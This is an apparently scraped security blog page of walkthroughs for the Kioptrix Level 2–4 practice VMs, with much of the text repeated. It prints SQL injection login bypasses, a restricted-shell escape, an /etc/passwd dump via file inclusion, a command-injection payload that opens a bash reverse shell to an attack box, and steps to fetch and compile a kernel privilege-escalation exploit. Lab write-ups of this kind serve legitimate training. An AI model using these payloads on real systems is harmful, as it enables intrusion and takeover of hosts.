MS08_067 is probably one of the most famous exploits out there, but trying to find information on how it actually works can be a nightmare. I came across a brilliant piece of writing from Jason Matthyser at MWR Labs, so I thought I would share it here:
Thursday, 16 February 2017
Kioptrix Level 4
Back at the next Kioptrix Level. This one was a little bit sneakier than the last one. I had to scratch my head a few times that's for certain!!
NMap
We can see that the usual ports are open (22,80) but we have 139 & 445 now. The service scan has given me a little bit of info so it's time to see what else it can yield via Enum4Linux.
Looks like I have a few users to try, I'll goto the web page and see what awaits.
Just a login page. There is nothing hidden or showing up via Dirb and Nikto isn't giving much away either.
I try one of the usernames to see what I get.
It looks like it's talking to a database of some kind in the background, so I will try and see if I can get it to error.
Using :
I get this nice MySQL error :)
I try hitting the boxes with various SQLi variations but I don't get a hit. So I decided to see if I could modify it on the fly via Tamper Data.
Awesome news awaits:
I now have potential login credential.
I try the same with robert and I get:
The password gives rogue values when I try to decode it via base64. So I decide to try my luck with John's creds on the ssh service.
And they work!! This is awesome. But what's this banner about?
Looks like I am in jail!!! I need to break out of my cell. As echo is available I try
I now need to enumerate this box. I could do this manually but automation makes life easier. I look for a way to transfer files:
I have few tools at my disposal here which is good.
I try wget via a python server to get LinuxEnum.sh on my attack box:
Hmmmmm, this doesn't look good. I wonder if there is a rule in place to block this traffic? I'll try netcat
That's better!! Now to see what lurks on this box:
MySQL with root privileges! This could be useful:
I can see the databases time to see what lurks within:
Nothing I don't already have. I wonder if I can execute commands from within? This BLOG is useful in that regard
As I am in as root every command I run is the same as root running it so I can start doing something about my current privileges. The sudoers file seems a good start!!
Looks like that worked!!! No exploits to compile or Metasploit modules to run, just old fashioned enumerating and reading.
I really enjoyed this VM, I think it has been one of my favourites so far.
NMap
We can see that the usual ports are open (22,80) but we have 139 & 445 now. The service scan has given me a little bit of info so it's time to see what else it can yield via Enum4Linux.
Looks like I have a few users to try, I'll goto the web page and see what awaits.
Just a login page. There is nothing hidden or showing up via Dirb and Nikto isn't giving much away either.
I try one of the usernames to see what I get.
It looks like it's talking to a database of some kind in the background, so I will try and see if I can get it to error.
Using :
username: john password: 'OR 1=1--
I get this nice MySQL error :)
I try hitting the boxes with various SQLi variations but I don't get a hit. So I decided to see if I could modify it on the fly via Tamper Data.
Awesome news awaits:
I now have potential login credential.
I try the same with robert and I get:
The password gives rogue values when I try to decode it via base64. So I decide to try my luck with John's creds on the ssh service.
And they work!! This is awesome. But what's this banner about?
Looks like I am in jail!!! I need to break out of my cell. As echo is available I try
echo os.system('/bin/bash')
I now need to enumerate this box. I could do this manually but automation makes life easier. I look for a way to transfer files:
I have few tools at my disposal here which is good.
I try wget via a python server to get LinuxEnum.sh on my attack box:
Hmmmmm, this doesn't look good. I wonder if there is a rule in place to block this traffic? I'll try netcat
That's better!! Now to see what lurks on this box:
MySQL with root privileges! This could be useful:
I can see the databases time to see what lurks within:
Nothing I don't already have. I wonder if I can execute commands from within? This BLOG is useful in that regard
As I am in as root every command I run is the same as root running it so I can start doing something about my current privileges. The sudoers file seems a good start!!
Looks like that worked!!! No exploits to compile or Metasploit modules to run, just old fashioned enumerating and reading.
I really enjoyed this VM, I think it has been one of my favourites so far.
Wednesday, 15 February 2017
Kioptrix Level 3 (Don't forget the low hanging fruit)
Back again!!
I'm continuing with the Kioptrix series as I am really enjoying it. The trouble is......... I seem to be over thinking stuff and forgetting this isn't meant to be "difficult". Anyway enough pre-amble and more how to!!!
Scanning
Only ssh and web are open here.
Web Checks
Browsing to the IP gave me the website below:
There wasn't a robots.txt file giving any hidden directories away, so I carried on perusing the content to see if there was anymore info:
I noticed the URL for the blog was interesting:
I wondered if I could manipulate it to give me information. First of all I tried some local file inclusion LFI:
This took some tinkering as just adding a null byte () didn't work. I had to insert a character after the null byte in order for it to yield a result.
This made me think of a way to automate this task. After looking around on the web I found this code from a BLOG. I noticed it only scanned for conventional LFI so I amended it to my needs. The code can be found HERE. When I ran the code it gave me the results quickly:
That was a useful learning point for me, as my coding isn't the greatest. So what did the LFI give me?
2 users that are of interest:
I couldn't pull the shadow file to grab their login creds, but I could have a go at brute forcing my way in via ssh.
Unfortunately Hydra was playing up and kept giving me errors but it wasn't an issue as I could use Patator.
I now had some creds I could use to SSH across.
I use loneferret's account first (it was first in the list)
Let's have a look at what's inside the folder I am in
Looks like the home directory to me!
Reading the CompanyPolicy.README showed the "sudo ht" command. I ran it to see what this was, unfortunately I had an issue with my terminal type so I amended it:
Looks like I have an editor with root privs COOL!!! I wonder if I can edit the /etc/sudoers file
That a big yes!!
So, save and exit:
I am root!! It looks like the HT editor is susceptible to Buffer Overflow
However when I tried to run the exploit on the server I got an error with the Perl version. I will revisit this again. Now onto the other methods of rooting this box?
SQLi
The blog indicates there is a gallery:
Now I wonder what awaits me here?
After looking around I came to this page:
The URL here looks interesting:
I wonder if I can inject?
Yup!!
Looks like there are 6 columns to peruse:
And column 2 is vulnerable to injection!
Looks like I have a MYSQL DB running on a Ubuntu server.
The current DB in use here is gallery.
And there are these tables sitting on the server too.
Enumerating the table "dev_accounts" gave:
Grabbing the details from this gave:
MD5 hashed passwords for the 2 users we already had :)
I could have used SQLmap to make it easier but sometimes you need to check manually as automation doesn't always make things better!!
SQLi for Admin
By enumerating the gallarific_users table we get:
Which allows me to login to the myphpadmin page and grab the creds of loneferret and dreg.
There are other ways to root this box like using code injection to get a netcat shell, so go wild!!!
I'm continuing with the Kioptrix series as I am really enjoying it. The trouble is......... I seem to be over thinking stuff and forgetting this isn't meant to be "difficult". Anyway enough pre-amble and more how to!!!
Scanning
Only ssh and web are open here.
Web Checks
Browsing to the IP gave me the website below:
There wasn't a robots.txt file giving any hidden directories away, so I carried on perusing the content to see if there was anymore info:
I noticed the URL for the blog was interesting:
I wondered if I could manipulate it to give me information. First of all I tried some local file inclusion LFI:
This took some tinkering as just adding a null byte () didn't work. I had to insert a character after the null byte in order for it to yield a result.
This made me think of a way to automate this task. After looking around on the web I found this code from a BLOG. I noticed it only scanned for conventional LFI so I amended it to my needs. The code can be found HERE. When I ran the code it gave me the results quickly:
That was a useful learning point for me, as my coding isn't the greatest. So what did the LFI give me?
2 users that are of interest:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
I couldn't pull the shadow file to grab their login creds, but I could have a go at brute forcing my way in via ssh.
Unfortunately Hydra was playing up and kept giving me errors but it wasn't an issue as I could use Patator.
I now had some creds I could use to SSH across.
I use loneferret's account first (it was first in the list)
Let's have a look at what's inside the folder I am in
Looks like the home directory to me!
Reading the CompanyPolicy.README showed the "sudo ht" command. I ran it to see what this was, unfortunately I had an issue with my terminal type so I amended it:
Looks like I have an editor with root privs COOL!!! I wonder if I can edit the /etc/sudoers file
That a big yes!!
So, save and exit:
I am root!! It looks like the HT editor is susceptible to Buffer Overflow
However when I tried to run the exploit on the server I got an error with the Perl version. I will revisit this again. Now onto the other methods of rooting this box?
SQLi
The blog indicates there is a gallery:
Now I wonder what awaits me here?
After looking around I came to this page:
The URL here looks interesting:
I wonder if I can inject?
Yup!!
Looks like there are 6 columns to peruse:
And column 2 is vulnerable to injection!
Looks like I have a MYSQL DB running on a Ubuntu server.
The current DB in use here is gallery.
And there are these tables sitting on the server too.
Enumerating the table "dev_accounts" gave:
Grabbing the details from this gave:
MD5 hashed passwords for the 2 users we already had :)
I could have used SQLmap to make it easier but sometimes you need to check manually as automation doesn't always make things better!!
SQLi for Admin
By enumerating the gallarific_users table we get:
Which allows me to login to the myphpadmin page and grab the creds of loneferret and dreg.
There are other ways to root this box like using code injection to get a netcat shell, so go wild!!!
Wednesday, 8 February 2017
Kioptrix Level 2 Ping This!
I am really liking this VM series so far as I am the first to admit that my web app fu is not the best. This is allowing me to go back and test against simpler things as a confidence check for myself.
So how did I root this VM?
It started with a scan
After performing a 1-65535 ports scan using NMap I found out the following ports were open.
Looking at the results it seemed sensible to look at port 80 first.
This is what greeted me:
An admin login screen. After throwing in some random input into the user and pass fields it showed it was sat on "index.php" My first thought was "SQLinjection" and it turned out I was right.
A simple:
I pinged an ip on my network and got this:
It looks like by putting in an ip address and clicking submit calls the pingit.php page. This shows that it echoes back the ip I typed then actually pings it. There is a chance I can inject my own commands here.
Command injection
Definition
This method is great for getting shells on boxes.
A look at the source code showed:
The data in the box isn't being sanitised, so my chances of injection now look good :)
I try to list the directory of the website:
And it works!
Now to try to see if I can use a simple bash reverse shell with a netcat listener:
On my attack box I type:
This is essentially making my box sit and listen for any connections calling into it on this port.
On the vulnerable web app I type:
This should open a bash reverse shell on my machine.
So how did I root this VM?
It started with a scan
After performing a 1-65535 ports scan using NMap I found out the following ports were open.
Looking at the results it seemed sensible to look at port 80 first.
This is what greeted me:
An admin login screen. After throwing in some random input into the user and pass fields it showed it was sat on "index.php" My first thought was "SQLinjection" and it turned out I was right.
A simple:
' OR 1 = 1 -- (don't forget the space after the last - )Gave me access to this page:
I pinged an ip on my network and got this:
It looks like by putting in an ip address and clicking submit calls the pingit.php page. This shows that it echoes back the ip I typed then actually pings it. There is a chance I can inject my own commands here.
Command injection
Definition
This method is great for getting shells on boxes.
A look at the source code showed:
The data in the box isn't being sanitised, so my chances of injection now look good :)
I try to list the directory of the website:
And it works!
Now to try to see if I can use a simple bash reverse shell with a netcat listener:
On my attack box I type:
netcat -v -l -p 4444
This is essentially making my box sit and listen for any connections calling into it on this port.
On the vulnerable web app I type:
192.168.1.1; bash -i >& /dev/tcp/192.168.1.17/4444 0>&1
This should open a bash reverse shell on my machine.
And it does. Unfortunately I am only in as apache, so I need to look at elevating my privileges in order to root this box.
Now it was time to start enumerating the box to see what was under the hood.
Looks like I have CentOS 4.5 sat on the Linux kernel 2.6.9 Research lead me to Exploit-DB
This exploit scores reasonably high over at National Vulnerability Database so should be quite useful!
I need to see what other tools are sat on this box as I need to be able to transfer the file over.
A quick type of wget show it's installed so that will be handy :)
On my attack box, I wget the code from Exploit-DB:
wget https://www.exploit-db.com/download/9542
I then start up a web server on my attack box
python -m SimpleHTTPServer 80
Now I am serving out the file I can now transfer it to the vulnerable server.
I wget the file from my attack box:
cd /tmpThis is a location I can write to.
wget http://192.168.1.17/9542.c
Now I have the code, it's time to compile it.
gcc -o pwn 9542.c
I now have an executable file to run.
Another #tangodown
Conclusion
I went into this vm with an attitude that I was going to be looking for local exploits (SUID) for some reason? This sent me off on a bit of a tangent to be honest. However once I slapped myself, I got the quickly.
Until next time, bye!!!!!
Subscribe to:
Posts (Atom)